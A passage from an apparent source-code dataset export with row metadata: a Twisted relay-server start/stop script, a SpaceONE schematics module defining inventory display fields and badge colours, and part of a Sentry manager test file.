        print("error: unable to shut down old server")
        return 1
    print(" old server shut down")
    start_server(args)
| 29.191781 | 78 | 0.632098 | from __future__ import print_function, unicode_literals
import os, time
from twisted.python import usage
from twisted.scripts import twistd
class MyPlugin(object):
tapname = "xyznode"
def __init__(self, args):
self.args = args
def makeService(self, so):
# accept --reactor= selection
from .server import RelayServer
return RelayServer(
str(self.args.rendezvous),
self.args.advertise_version,
self.args.relay_database_path,
self.args.blur_usage,
signal_error=self.args.signal_error,
stats_file=self.args.stats_json_path,
allow_list=self.args.allow_list,
)
class MyTwistdConfig(twistd.ServerOptions):
subCommands = [("XYZ", None, usage.Options, "node")]
def start_server(args):
c = MyTwistdConfig()
#twistd_args = tuple(args.twistd_args) + ("XYZ",)
base_args = []
if args.no_daemon:
base_args.append("--nodaemon")
twistd_args = base_args + ["XYZ"]
c.parseOptions(tuple(twistd_args))
c.loadedPlugins = {"XYZ": MyPlugin(args)}
print("starting wormhole relay server")
# this forks and never comes back. The parent calls os._exit(0)
twistd.runApp(c)
def kill_server():
try:
f = open("twistd.pid", "r")
except EnvironmentError:
print("Unable to find twistd.pid: is this really a server directory?")
print("oh well, ignoring 'stop'")
return
pid = int(f.read().strip())
f.close()
os.kill(pid, 15)
print("server process %d sent SIGTERM" % pid)
return
def stop_server(args):
kill_server()
def restart_server(args):
kill_server()
time.sleep(0.1)
timeout = 0
while os.path.exists("twistd.pid") and timeout < 10:
if timeout == 0:
print(" waiting for shutdown..")
timeout += 1
time.sleep(1)
if os.path.exists("twistd.pid"):
print("error: unable to shut down old server")
return 1
print(" old server shut down")
start_server(args)
| true | true |
f7329645c63bbeced2675087da6bdc4f97ad2b38 | 14,433 | py | Python | src/spaceone/inventory/libs/schema/dynamic_field.py | xellos00/plugin-aws-cloud-services | 56ac9d6f2edafc5abcd236c046726f169a72e1f6 | [
"Apache-2.0"
] | 2 | 2020-06-22T09:49:22.000Z | 2021-01-03T22:21:27.000Z | src/spaceone/inventory/libs/schema/dynamic_field.py | xellos00/plugin-aws-cloud-services | 56ac9d6f2edafc5abcd236c046726f169a72e1f6 | [
"Apache-2.0"
] | 2 | 2020-07-20T01:58:32.000Z | 2020-08-04T07:41:37.000Z | src/spaceone/inventory/libs/schema/dynamic_field.py | xellos00/plugin-aws-cloud-services | 56ac9d6f2edafc5abcd236c046726f169a72e1f6 | [
"Apache-2.0"
] | 5 | 2020-10-13T15:05:12.000Z | 2021-04-19T10:25:24.000Z | import math
from schematics import Model
from schematics.types import ModelType, StringType, PolyModelType, DictType, ListType, BooleanType
from .dynamic_search import BaseDynamicSearch
# Color palette accepted for icon/badge styling: base color names plus
# their 100-900 shade variants. Used as `choices` by Icon and the badge
# option models below.
BACKGROUND_COLORS = [
    'black', 'white',
    'gray', 'gray.100', 'gray.200', 'gray.300', 'gray.400', 'gray.500', 'gray.600', 'gray.700', 'gray.800', 'gray.900',
    'red', 'red.100', 'red.200', 'red.300', 'red.400', 'red.500', 'red.600', 'red.700', 'red.800', 'red.900',
    'coral', 'coral.100', 'coral.200', 'coral.300', 'coral.400', 'coral.500', 'coral.600', 'coral.700', 'coral.800', 'coral.900',
    'yellow', 'yellow.100', 'yellow.200', 'yellow.300', 'yellow.400', 'yellow.500', 'yellow.600', 'yellow.700', 'yellow.800', 'yellow.900',
    'green', 'green.100', 'green.200', 'green.300', 'green.400', 'green.500', 'green.600', 'green.700', 'green.800', 'green.900',
    'blue', 'blue.100', 'blue.200', 'blue.300', 'blue.400', 'blue.500', 'blue.600', 'blue.700', 'blue.800', 'blue.900',
    'violet', 'violet.100', 'violet.200', 'violet.300', 'violet.400', 'violet.500', 'violet.600', 'violet.700', 'violet.800', 'violet.900',
    'peacock', 'peacock.100', 'peacock.200', 'peacock.300', 'peacock.400', 'peacock.500', 'peacock.600', 'peacock.700', 'peacock.800', 'peacock.900',
    'indigo', 'indigo.100', 'indigo.200', 'indigo.300', 'indigo.400', 'indigo.500', 'indigo.600', 'indigo.700', 'indigo.800', 'indigo.900',
]
# Outline colors cycled through by EnumDyField.data_source when it
# auto-assigns badge colors to default_outline_badge values.
TYPE_BADGE = ['primary', 'indigo.500', 'coral.600', 'peacock.500', 'green.500']
class FieldReference(Model):
    """Link from a dynamic field to another inventory resource type."""
    resource_type = StringType()
    reference_key = StringType(serialize_when_none=False)
class Icon(Model):
    """Icon specification: optional image plus a palette color."""
    image = StringType(serialize_when_none=False)
    # Restricted to BACKGROUND_COLORS; defaults to 'green'.
    color = StringType(default='green', choices=BACKGROUND_COLORS)
class BaseField(Model):
    """Common shape of every dynamic field: a renderer type plus options."""
    # Which renderer the UI applies to this field's values.
    type = StringType(choices=["text", "state", "badge", "list", "dict",
                               "datetime", "image", "enum", "progress", "size"],
                      serialize_when_none=False)
    # Renderer-specific options: either one options model or (for enum
    # fields) a mapping of value -> options model.
    options = PolyModelType([Model, DictType(PolyModelType(Model))], serialize_when_none=False)
class FieldViewOption(Model):
    """Display options shared by all dynamic-field renderers
    (links, sorting, defaults, pre/postfix decoration, descriptions)."""
    link = StringType(serialize_when_none=False)
    variables = StringType(serialize_when_none=False)
    sortable = BooleanType(serialize_when_none=False)
    sort_key = StringType(serialize_when_none=False)
    translation_id = StringType(serialize_when_none=False)
    default = StringType(serialize_when_none=False)
    is_optional = BooleanType(serialize_when_none=False)
    postfix = StringType(serialize_when_none=False)
    prefix = StringType(serialize_when_none=False)
    field_description = StringType(serialize_when_none=False)
class BaseDynamicField(BaseField):
    """Base declaration for table fields: display name plus data key."""
    name = StringType()
    key = StringType()
    reference = ModelType(FieldReference, serialize_when_none=False)

    @classmethod
    def data_source(cls, name, key, **kwargs):
        # Extra keyword arguments may override 'key'/'name' (same
        # precedence as the original dict-literal merge).
        params = {'key': key, 'name': name}
        params.update(kwargs)
        return cls(params)
class TextDyFieldOptions(FieldViewOption):
    """Options for text fields; adds nothing beyond the shared view options."""
    pass
class BadgeDyFieldOptions(FieldViewOption):
    """Badge styling: text/outline/background colors and shape."""
    text_color = StringType(serialize_when_none=False)
    shape = StringType(serialize_when_none=False, choices=['SQUARE', 'ROUND'])
    outline_color = StringType(serialize_when_none=False, choices=BACKGROUND_COLORS)
    background_color = StringType(serialize_when_none=False, choices=BACKGROUND_COLORS)
class StateDyFieldOptions(FieldViewOption):
    """State styling: text color plus an optional status icon."""
    text_color = StringType(serialize_when_none=False)
    icon = ModelType(Icon, serialize_when_none=False)
class ImageDyFieldOptions(FieldViewOption):
    """Image rendering: source URL and optional fixed dimensions."""
    image_url = StringType(default='')
    width = StringType(serialize_when_none=False)
    height = StringType(serialize_when_none=False)
class DateTimeDyFieldOptions(FieldViewOption):
    """Datetime handling: how raw values are parsed and displayed."""
    # Raw value encoding: epoch 'timestamp' unless declared 'iso8601'.
    source_type = StringType(default='timestamp', choices=['iso8601', 'timestamp'])
    source_format = StringType(serialize_when_none=False)
    display_format = StringType(serialize_when_none=False)
class ProgressFieldOptions(FieldViewOption):
    """Progress-bar options: unit label for the displayed value."""
    unit = StringType(serialize_when_none=False)
class SizeFieldOptions(FieldViewOption):
    """Byte-size options: unit the raw value is in, and unit to display."""
    display_unit = StringType(serialize_when_none=False, choices=('BYTES', 'KB', 'MB', 'GB', 'TB', 'PB'))
    source_unit = StringType(serialize_when_none=False, choices=('BYTES', 'KB', 'MB', 'GB', 'TB', 'PB'))
class TextDyField(BaseDynamicField):
    """Dynamic field rendered as plain text."""
    type = StringType(default="text")
    options = PolyModelType(TextDyFieldOptions, serialize_when_none=False)

    @classmethod
    def data_source(cls, name, key, **kwargs):
        source = {'key': key, 'name': name}
        if 'options' in kwargs:
            source['options'] = TextDyFieldOptions(kwargs.get('options'))
        if 'reference' in kwargs:
            source['reference'] = kwargs.get('reference')
        return cls(source)
class StateDyField(BaseDynamicField):
    """Dynamic field rendered as a state (colored text and/or icon)."""
    type = StringType(default="state")
    options = PolyModelType(StateDyFieldOptions, serialize_when_none=False)

    @classmethod
    def data_source(cls, name, key, **kwargs):
        source = {'key': key, 'name': name}
        if 'options' in kwargs:
            source['options'] = StateDyFieldOptions(kwargs.get('options'))
        if 'reference' in kwargs:
            source['reference'] = kwargs.get('reference')
        return cls(source)
class BadgeDyField(BaseDynamicField):
    """Dynamic field rendered as a badge; neutral gray when unstyled."""
    type = StringType(default="badge")
    options = PolyModelType(BadgeDyFieldOptions, serialize_when_none=False)

    @classmethod
    def data_source(cls, name, key, **kwargs):
        source = {'key': key, 'name': name}
        if 'options' in kwargs:
            source['options'] = BadgeDyFieldOptions(kwargs.get('options'))
        else:
            # Default to a neutral gray badge when no styling is supplied.
            source['options'] = BadgeDyFieldOptions({
                'background_color': 'gray.200',
                'text_color': 'gray.900',
            })
        if 'reference' in kwargs:
            source['reference'] = kwargs.get('reference')
        return cls(source)
class ImageDyField(BaseDynamicField):
    """Dynamic field rendered as an image."""
    type = StringType(default="image")
    options = PolyModelType(ImageDyFieldOptions, serialize_when_none=False)

    @classmethod
    def data_source(cls, name, key, **kwargs):
        source = {'key': key, 'name': name}
        if 'options' in kwargs:
            source['options'] = ImageDyFieldOptions(kwargs.get('options'))
        if 'reference' in kwargs:
            source['reference'] = kwargs.get('reference')
        return cls(source)
class DateTimeDyField(BaseDynamicField):
    """Dynamic field rendered as a formatted datetime."""
    type = StringType(default="datetime")
    options = PolyModelType(DateTimeDyFieldOptions, serialize_when_none=False)

    @classmethod
    def data_source(cls, name, key, **kwargs):
        source = {'key': key, 'name': name}
        if 'options' in kwargs:
            source['options'] = DateTimeDyFieldOptions(kwargs.get('options'))
        if 'reference' in kwargs:
            source['reference'] = kwargs.get('reference')
        return cls(source)
class DictDyField(BaseDynamicField):
    """Dynamic field rendering its value as a key/value dictionary."""
    type = StringType(default="dict")
    options = PolyModelType(FieldViewOption, serialize_when_none=False)
class StateItemDyField(BaseField):
    """Per-value 'state' styling used inside an enum field's options map."""
    type = StringType(default="state")
    options = PolyModelType(StateDyFieldOptions, serialize_when_none=False)
    @classmethod
    def set(cls, options):
        # Wrap a plain dict of state options into a typed item.
        return cls({'options': StateDyFieldOptions(options)})
class BadgeItemDyField(BaseField):
    """Per-value 'badge' styling used inside enum/list field options."""
    type = StringType(default="badge")
    options = PolyModelType(BadgeDyFieldOptions, serialize_when_none=False)
    @classmethod
    def set(cls, options):
        # Wrap a plain dict of badge options into a typed item.
        return cls({'options': BadgeDyFieldOptions(options)})
class ImageItemDyField(BaseField):
    """Per-value 'image' styling used inside an enum field's options map."""
    type = StringType(default="image")
    options = PolyModelType(ImageDyFieldOptions, serialize_when_none=False)
    @classmethod
    def set(cls, options):
        # Wrap a plain dict of image options into a typed item.
        return cls({'options': ImageDyFieldOptions(options)})
class DatetimeItemDyField(BaseField):
    """Per-value 'datetime' styling used inside an enum field's options map."""
    type = StringType(default="datetime")
    options = PolyModelType(DateTimeDyFieldOptions, serialize_when_none=False)
    @classmethod
    def set(cls, options):
        # Wrap a plain dict of datetime options into a typed item.
        return cls({'options': DateTimeDyFieldOptions(options)})
class ListDyFieldOptions(FieldViewOption):
    """List rendering: per-item field, optional sub-key, and delimiter."""
    # Field declaration applied to each element of the list.
    item = PolyModelType([BadgeItemDyField, StateDyField, DateTimeDyField, DictDyField], serialize_when_none=False)
    sub_key = StringType(serialize_when_none=False)
    delimiter = StringType(serialize_when_none=False)
class ListDyField(BaseDynamicField):
    """Dynamic field rendering a list of values, optionally as badges."""
    type = StringType(default="list")
    options = PolyModelType(ListDyFieldOptions, serialize_when_none=False)

    @classmethod
    def data_source(cls, name, key, **kwargs):
        source = {'key': key, 'name': name}
        if 'default_badge' in kwargs:
            badge = kwargs.get('default_badge')
            opts = {'delimiter': ' '}
            # 'outline' / 'inline' pick a violet badge style for each item.
            badge_type = badge.get('type') if 'type' in badge else None
            if badge_type == 'outline':
                opts['item'] = BadgeItemDyField.set({'outline_color': 'violet.500'})
            elif badge_type == 'inline':
                opts['item'] = BadgeItemDyField.set({'background_color': 'violet.500'})
            if 'sub_key' in badge:
                opts['sub_key'] = badge.get('sub_key')
            if 'delimiter' in badge:
                opts['delimiter'] = badge.get('delimiter')
            source['options'] = ListDyFieldOptions(opts)
        if 'options' in kwargs:
            source['options'] = ListDyFieldOptions(kwargs.get('options'))
        if 'reference' in kwargs:
            source['reference'] = kwargs.get('reference')
        return cls(source)
class EnumDyField(BaseDynamicField):
    """Dynamic field that renders each raw value through a per-value style.

    ``options`` maps a raw value to the state/badge/image/datetime item
    used to display it.
    """
    type = StringType(default="enum")
    options = DictType(PolyModelType([StateItemDyField, BadgeItemDyField, ImageItemDyField, DatetimeItemDyField]),
                       serialize_when_none=False,
                       default={})

    @classmethod
    def data_source(cls, name, key, **kwargs):
        """Build an enum field declaration.

        Keyword arguments:
            default_outline_badge: list of values; each gets an outline badge
                whose color cycles through TYPE_BADGE.
            default_badge: {background_color: [values]} mapping.
            default_state: {level: [values]} mapping, where level is one of
                safe/disable/warning/available/alert (anything else gets the
                neutral gray icon).
            options: explicit options dict overriding the generated one.
            reference: optional FieldReference payload.
        """
        _data_source = {'key': key, 'name': name}
        _default_badge = kwargs.get('default_badge', {})
        _default_state = kwargs.get('default_state', {})
        _default_outline_badge = kwargs.get('default_outline_badge', [])

        _options_dic = {}
        # Cycle colors with a simple modulo. The original floor/index
        # bookkeeping was an O(n^2) re-derivation of the same thing and
        # picked the first occurrence's color for duplicate values.
        for _position, _value in enumerate(_default_outline_badge):
            _color = TYPE_BADGE[_position % len(TYPE_BADGE)]
            _options_dic[_value] = BadgeItemDyField.set({'outline_color': _color})

        for _color, _values in _default_badge.items():
            for _value in _values:
                _options_dic[_value] = BadgeItemDyField.set({'background_color': _color})

        # Semantic state levels -> icon/text styling (same values as before).
        _state_styles = {
            'safe': {'icon': {'color': 'green.500'}},
            'disable': {'icon': {'color': 'gray.400'}, 'text_color': 'gray.400'},
            'warning': {'icon': {'color': 'yellow.500'}},
            'available': {'icon': {'color': 'blue.400'}},
            'alert': {'text_color': 'red.500', 'icon': {'color': 'red.500'}},
        }
        for _level, _values in _default_state.items():
            _style = _state_styles.get(_level, {'icon': {'color': 'gray.400'}})
            for _value in _values:
                _options_dic[_value] = StateItemDyField.set(_style)

        _data_source.update({'options': _options_dic})
        if 'options' in kwargs:
            _data_source.update({'options': kwargs.get('options')})
        if 'reference' in kwargs:
            _data_source.update({'reference': kwargs.get('reference')})
        return cls(_data_source)
class ProgressField(BaseDynamicField):
    """Dynamic field rendered as a progress bar."""
    type = StringType(default="progress")
    options = PolyModelType(ProgressFieldOptions, serialize_when_none=False)

    @classmethod
    def data_source(cls, name, key, **kwargs):
        source = {'key': key, 'name': name}
        if 'options' in kwargs:
            # NOTE: unlike TextDyField etc. this passes the raw options dict
            # through without wrapping it in ProgressFieldOptions (original
            # behavior preserved).
            source['options'] = kwargs.get('options')
        return cls(source)
class SizeField(BaseDynamicField):
    """Dynamic field rendered as a human-readable byte size."""
    type = StringType(default="size")
    options = PolyModelType(SizeFieldOptions, serialize_when_none=False)

    @classmethod
    def data_source(cls, name, key, **kwargs):
        source = {'key': key, 'name': name}
        if 'options' in kwargs:
            # Raw options dict is passed through unwrapped (original behavior).
            source['options'] = kwargs.get('options')
        return cls(source)
class SearchEnumField(Model):
    """Display metadata (label/icon) for one enum value in search."""
    label = StringType(serialize_when_none=False)
    icon = ModelType(Icon, serialize_when_none=False)

    @classmethod
    def set_field(cls, label=None, icon=None):
        fields = {}
        if label is not None:
            fields['label'] = label
        if icon is not None:
            fields['icon'] = Icon(icon)
        return cls(fields)
class SearchField(BaseDynamicSearch):
    """Search key declaration with optional enum labels and a reference."""
    enums = DictType(ModelType(SearchEnumField), serialize_when_none=False)
    reference = StringType(serialize_when_none=False)

    @classmethod
    def set(cls, name='', key='', data_type=None, enums=None, reference=None):
        fields = {
            'name': name,
            'key': key
        }
        if data_type is not None:
            fields['data_type'] = data_type
        if reference is not None:
            fields['reference'] = reference
        if enums is not None:
            # Convert plain per-value dicts into SearchEnumField instances.
            fields['enums'] = {
                value: SearchEnumField.set_field(**meta)
                for value, meta in enums.items()
            }
        return cls(fields)
| 36.355164 | 149 | 0.655304 | import math
from schematics import Model
from schematics.types import ModelType, StringType, PolyModelType, DictType, ListType, BooleanType
from .dynamic_search import BaseDynamicSearch
BACKGROUND_COLORS = [
'black', 'white',
'gray', 'gray.100', 'gray.200', 'gray.300', 'gray.400', 'gray.500', 'gray.600', 'gray.700', 'gray.800', 'gray.900',
'red', 'red.100', 'red.200', 'red.300', 'red.400', 'red.500', 'red.600', 'red.700', 'red.800', 'red.900',
'coral', 'coral.100', 'coral.200', 'coral.300', 'coral.400', 'coral.500', 'coral.600', 'coral.700', 'coral.800', 'coral.900',
'yellow', 'yellow.100', 'yellow.200', 'yellow.300', 'yellow.400', 'yellow.500', 'yellow.600', 'yellow.700', 'yellow.800', 'yellow.900',
'green', 'green.100', 'green.200', 'green.300', 'green.400', 'green.500', 'green.600', 'green.700', 'green.800', 'green.900',
'blue', 'blue.100', 'blue.200', 'blue.300', 'blue.400', 'blue.500', 'blue.600', 'blue.700', 'blue.800', 'blue.900',
'violet', 'violet.100', 'violet.200', 'violet.300', 'violet.400', 'violet.500', 'violet.600', 'violet.700', 'violet.800', 'violet.900',
'peacock', 'peacock.100', 'peacock.200', 'peacock.300', 'peacock.400', 'peacock.500', 'peacock.600', 'peacock.700', 'peacock.800', 'peacock.900',
'indigo', 'indigo.100', 'indigo.200', 'indigo.300', 'indigo.400', 'indigo.500', 'indigo.600', 'indigo.700', 'indigo.800', 'indigo.900',
]
TYPE_BADGE = ['primary', 'indigo.500', 'coral.600', 'peacock.500', 'green.500']
class FieldReference(Model):
resource_type = StringType()
reference_key = StringType(serialize_when_none=False)
class Icon(Model):
image = StringType(serialize_when_none=False)
color = StringType(default='green', choices=BACKGROUND_COLORS)
class BaseField(Model):
type = StringType(choices=["text", "state", "badge", "list", "dict",
"datetime", "image", "enum", "progress", "size"],
serialize_when_none=False)
options = PolyModelType([Model, DictType(PolyModelType(Model))], serialize_when_none=False)
class FieldViewOption(Model):
link = StringType(serialize_when_none=False)
variables = StringType(serialize_when_none=False)
sortable = BooleanType(serialize_when_none=False)
sort_key = StringType(serialize_when_none=False)
translation_id = StringType(serialize_when_none=False)
default = StringType(serialize_when_none=False)
is_optional = BooleanType(serialize_when_none=False)
postfix = StringType(serialize_when_none=False)
prefix = StringType(serialize_when_none=False)
field_description = StringType(serialize_when_none=False)
class BaseDynamicField(BaseField):
name = StringType()
key = StringType()
reference = ModelType(FieldReference, serialize_when_none=False)
@classmethod
def data_source(cls, name, key, **kwargs):
return cls({'key': key, 'name': name, **kwargs})
class TextDyFieldOptions(FieldViewOption):
pass
class BadgeDyFieldOptions(FieldViewOption):
text_color = StringType(serialize_when_none=False)
shape = StringType(serialize_when_none=False, choices=['SQUARE', 'ROUND'])
outline_color = StringType(serialize_when_none=False, choices=BACKGROUND_COLORS)
background_color = StringType(serialize_when_none=False, choices=BACKGROUND_COLORS)
class StateDyFieldOptions(FieldViewOption):
text_color = StringType(serialize_when_none=False)
icon = ModelType(Icon, serialize_when_none=False)
class ImageDyFieldOptions(FieldViewOption):
image_url = StringType(default='')
width = StringType(serialize_when_none=False)
height = StringType(serialize_when_none=False)
class DateTimeDyFieldOptions(FieldViewOption):
source_type = StringType(default='timestamp', choices=['iso8601', 'timestamp'])
source_format = StringType(serialize_when_none=False)
display_format = StringType(serialize_when_none=False)
class ProgressFieldOptions(FieldViewOption):
unit = StringType(serialize_when_none=False)
class SizeFieldOptions(FieldViewOption):
display_unit = StringType(serialize_when_none=False, choices=('BYTES', 'KB', 'MB', 'GB', 'TB', 'PB'))
source_unit = StringType(serialize_when_none=False, choices=('BYTES', 'KB', 'MB', 'GB', 'TB', 'PB'))
class TextDyField(BaseDynamicField):
type = StringType(default="text")
options = PolyModelType(TextDyFieldOptions, serialize_when_none=False)
@classmethod
def data_source(cls, name, key, **kwargs):
_data_source = {'key': key, 'name': name}
if 'options' in kwargs:
_data_source.update({'options': TextDyFieldOptions(kwargs.get('options'))})
if 'reference' in kwargs:
_data_source.update({'reference': kwargs.get('reference')})
return cls(_data_source)
class StateDyField(BaseDynamicField):
type = StringType(default="state")
options = PolyModelType(StateDyFieldOptions, serialize_when_none=False)
@classmethod
def data_source(cls, name, key, **kwargs):
_data_source = {'key': key, 'name': name}
if 'options' in kwargs:
_data_source.update({'options': StateDyFieldOptions(kwargs.get('options'))})
if 'reference' in kwargs:
_data_source.update({'reference': kwargs.get('reference')})
return cls(_data_source)
class BadgeDyField(BaseDynamicField):
type = StringType(default="badge")
options = PolyModelType(BadgeDyFieldOptions, serialize_when_none=False)
@classmethod
def data_source(cls, name, key, **kwargs):
_data_source = {'key': key, 'name': name}
if 'options' in kwargs:
_data_source.update({'options': BadgeDyFieldOptions(kwargs.get('options'))})
else:
_data_source.update({'options': BadgeDyFieldOptions({'background_color': 'gray.200',
'text_color': 'gray.900'})})
if 'reference' in kwargs:
_data_source.update({'reference': kwargs.get('reference')})
return cls(_data_source)
class ImageDyField(BaseDynamicField):
type = StringType(default="image")
options = PolyModelType(ImageDyFieldOptions, serialize_when_none=False)
@classmethod
def data_source(cls, name, key, **kwargs):
_data_source = {'key': key, 'name': name}
if 'options' in kwargs:
_data_source.update({'options': ImageDyFieldOptions(kwargs.get('options'))})
if 'reference' in kwargs:
_data_source.update({'reference': kwargs.get('reference')})
return cls(_data_source)
class DateTimeDyField(BaseDynamicField):
type = StringType(default="datetime")
options = PolyModelType(DateTimeDyFieldOptions, serialize_when_none=False)
@classmethod
def data_source(cls, name, key, **kwargs):
_data_source = {'key': key, 'name': name}
if 'options' in kwargs:
_data_source.update({'options': DateTimeDyFieldOptions(kwargs.get('options'))})
if 'reference' in kwargs:
_data_source.update({'reference': kwargs.get('reference')})
return cls(_data_source)
class DictDyField(BaseDynamicField):
type = StringType(default="dict")
options = PolyModelType(FieldViewOption, serialize_when_none=False)
class StateItemDyField(BaseField):
type = StringType(default="state")
options = PolyModelType(StateDyFieldOptions, serialize_when_none=False)
@classmethod
def set(cls, options):
return cls({'options': StateDyFieldOptions(options)})
class BadgeItemDyField(BaseField):
type = StringType(default="badge")
options = PolyModelType(BadgeDyFieldOptions, serialize_when_none=False)
@classmethod
def set(cls, options):
return cls({'options': BadgeDyFieldOptions(options)})
class ImageItemDyField(BaseField):
type = StringType(default="image")
options = PolyModelType(ImageDyFieldOptions, serialize_when_none=False)
@classmethod
def set(cls, options):
return cls({'options': ImageDyFieldOptions(options)})
class DatetimeItemDyField(BaseField):
type = StringType(default="datetime")
options = PolyModelType(DateTimeDyFieldOptions, serialize_when_none=False)
@classmethod
def set(cls, options):
return cls({'options': DateTimeDyFieldOptions(options)})
class ListDyFieldOptions(FieldViewOption):
item = PolyModelType([BadgeItemDyField, StateDyField, DateTimeDyField, DictDyField], serialize_when_none=False)
sub_key = StringType(serialize_when_none=False)
delimiter = StringType(serialize_when_none=False)
class ListDyField(BaseDynamicField):
type = StringType(default="list")
options = PolyModelType(ListDyFieldOptions, serialize_when_none=False)
@classmethod
def data_source(cls, name, key, **kwargs):
_data_source = {'key': key, 'name': name}
if 'default_badge' in kwargs:
_default_badge = kwargs.get('default_badge')
_list_options = {'delimiter': ' '}
if 'type' in _default_badge and _default_badge.get('type') == 'outline':
_list_options.update({'item': BadgeItemDyField.set({'outline_color': 'violet.500'})})
elif 'type' in _default_badge and _default_badge.get('type') == 'inline':
_list_options.update({'item': BadgeItemDyField.set({'background_color': 'violet.500'})})
if 'sub_key' in _default_badge:
_list_options.update({'sub_key': _default_badge.get('sub_key')})
if 'delimiter' in _default_badge:
_list_options.update({'delimiter': _default_badge.get('delimiter')})
_data_source.update({'options': ListDyFieldOptions(_list_options)})
if 'options' in kwargs:
_data_source.update({'options': ListDyFieldOptions(kwargs.get('options'))})
if 'reference' in kwargs:
_data_source.update({'reference': kwargs.get('reference')})
return cls(_data_source)
class EnumDyField(BaseDynamicField):
type = StringType(default="enum")
options = DictType(PolyModelType([StateItemDyField, BadgeItemDyField, ImageItemDyField, DatetimeItemDyField]),
serialize_when_none=False,
default={})
@classmethod
def data_source(cls, name, key, **kwargs):
_data_source = {'key': key, 'name': name}
_default_badge = kwargs.get('default_badge', {})
_default_state = kwargs.get('default_state', {})
_default_outline_badge = kwargs.get('default_outline_badge', [])
_options_dic = {}
for _key in _default_outline_badge:
_round_index = len(TYPE_BADGE)
_index = _default_outline_badge.index(_key)
_num = math.floor(_index/len(TYPE_BADGE))
if _num > 0:
_round_index = len(TYPE_BADGE)*_num
if _round_index - 1 < _index:
_index = _index - _round_index
_options_dic[_key] = BadgeItemDyField.set({'outline_color': TYPE_BADGE[_index]})
for _key in _default_badge:
for _badge in _default_badge[_key]:
_options_dic[_badge] = BadgeItemDyField.set({'background_color': _key})
for _key in _default_state:
for _state in _default_state[_key]:
_state_options = {'icon': {'color': 'gray.400'}}
if _key == 'safe':
_state_options = {'icon': {'color': 'green.500'}}
elif _key == 'disable':
_state_options.update({'text_color': 'gray.400'})
elif _key == 'warning':
_state_options = {'icon': {'color': 'yellow.500'}}
elif _key == 'available':
_state_options = {'icon': {'color': 'blue.400'}}
elif _key == 'alert':
_state_options = {'text_color': 'red.500', 'icon': {'color': 'red.500'}}
_options_dic[_state] = StateItemDyField.set(_state_options)
_data_source.update({'options': _options_dic})
if 'options' in kwargs:
_data_source.update({'options': kwargs.get('options')})
if 'reference' in kwargs:
_data_source.update({'reference': kwargs.get('reference')})
return cls(_data_source)
class ProgressField(BaseDynamicField):
type = StringType(default="progress")
options = PolyModelType(ProgressFieldOptions, serialize_when_none=False, )
@classmethod
def data_source(cls, name, key, **kwargs):
_data_source = {'key': key, 'name': name}
if 'options' in kwargs:
_data_source.update({'options': kwargs.get('options')})
return cls(_data_source)
class SizeField(BaseDynamicField):
type = StringType(default="size")
options = PolyModelType(SizeFieldOptions, serialize_when_none=False)
@classmethod
def data_source(cls, name, key, **kwargs):
_data_source = {'key': key, 'name': name}
if 'options' in kwargs:
_data_source.update({'options': kwargs.get('options')})
return cls(_data_source)
class SearchEnumField(Model):
label = StringType(serialize_when_none=False)
icon = ModelType(Icon, serialize_when_none=False)
@classmethod
def set_field(cls, label=None, icon=None):
return_dic = {}
if label is not None:
return_dic.update({'label': label})
if icon is not None:
return_dic.update({'icon': Icon(icon)})
return cls(return_dic)
class SearchField(BaseDynamicSearch):
enums = DictType(ModelType(SearchEnumField), serialize_when_none=False)
reference = StringType(serialize_when_none=False)
@classmethod
def set(cls, name='', key='', data_type=None, enums=None, reference=None):
return_dic = {
'name': name,
'key': key
}
if data_type is not None:
return_dic.update({'data_type': data_type})
if reference is not None:
return_dic.update({'reference': reference})
if enums is not None:
convert_enums = {}
for enum_key in enums:
enum_v = enums[enum_key]
convert_enums[enum_key] = SearchEnumField.set_field(**enum_v)
return_dic.update({
'enums': convert_enums
})
return cls(return_dic)
| true | true |
f732973ab5e14dcb0ef39a1adb7dc2e525a39b6e | 3,963 | py | Python | tests/sentry/manager/tests.py | pierredup/sentry | 0145e4b3bc0e775bf3482fe65f5e1a689d0dbb80 | [
"BSD-3-Clause"
] | 1 | 2019-10-17T17:46:16.000Z | 2019-10-17T17:46:16.000Z | tests/sentry/manager/tests.py | pierredup/sentry | 0145e4b3bc0e775bf3482fe65f5e1a689d0dbb80 | [
"BSD-3-Clause"
] | null | null | null | tests/sentry/manager/tests.py | pierredup/sentry | 0145e4b3bc0e775bf3482fe65f5e1a689d0dbb80 | [
"BSD-3-Clause"
] | null | null | null | from __future__ import absolute_import
from sentry.models import Group, Project, Team, User
from sentry.testutils import TestCase
class SentryManagerTest(TestCase):
    """Checks that Group.objects.from_kwargs builds a well-formed event."""
    def test_valid_only_message(self):
        event = Group.objects.from_kwargs(1, message="foo")
        # from_kwargs stamps the group's last_seen with the event's datetime.
        # assertEquals -> assertEqual: the alias was deprecated and removed
        # from unittest in Python 3.12.
        self.assertEqual(event.group.last_seen, event.datetime)
        self.assertEqual(event.message, "foo")
        self.assertEqual(event.project_id, 1)
class TeamManagerTest(TestCase):
    """Exercises Team.objects.get_for_user membership and scope filtering."""
    def test_simple(self):
        # A member of the team sees it when no scope is requested.
        user = User.objects.create(username="foo")
        org = self.create_organization()
        team = self.create_team(organization=org, name="Test")
        self.create_member(organization=org, user=user, teams=[team])
        result = Team.objects.get_for_user(organization=org, user=user)
        assert result == [team]
    def test_invalid_scope(self):
        # An unknown scope string yields no teams.
        user = User.objects.create(username="foo")
        org = self.create_organization()
        team = self.create_team(organization=org, name="Test")
        self.create_member(organization=org, user=user, teams=[team])
        result = Team.objects.get_for_user(organization=org, user=user, scope="idontexist")
        assert result == []
    def test_valid_scope(self):
        # A scope the member actually holds returns the team.
        user = User.objects.create(username="foo")
        org = self.create_organization()
        team = self.create_team(organization=org, name="Test")
        self.create_member(organization=org, user=user, teams=[team])
        result = Team.objects.get_for_user(organization=org, user=user, scope="project:read")
        assert result == [team]
    def test_user_no_access(self):
        # A user who is not a member of the organization sees nothing.
        user = User.objects.create(username="foo")
        user2 = User.objects.create(username="bar")
        org = self.create_organization()
        team = self.create_team(organization=org, name="Test")
        self.create_member(organization=org, user=user, teams=[team])
        result = Team.objects.get_for_user(organization=org, user=user2)
        assert result == []
    def test_with_projects(self):
        # with_projects=True pairs each team with its project list.
        # NOTE(review): the expected order [project2, project] implies results
        # are ordered by name ("bar" < "foo") -- confirm against get_for_user.
        user = User.objects.create(username="foo")
        org = self.create_organization()
        team = self.create_team(organization=org, name="Test")
        self.create_member(organization=org, user=user, teams=[team])
        project = self.create_project(teams=[team], name="foo")
        project2 = self.create_project(teams=[team], name="bar")
        result = Team.objects.get_for_user(organization=org, user=user, with_projects=True)
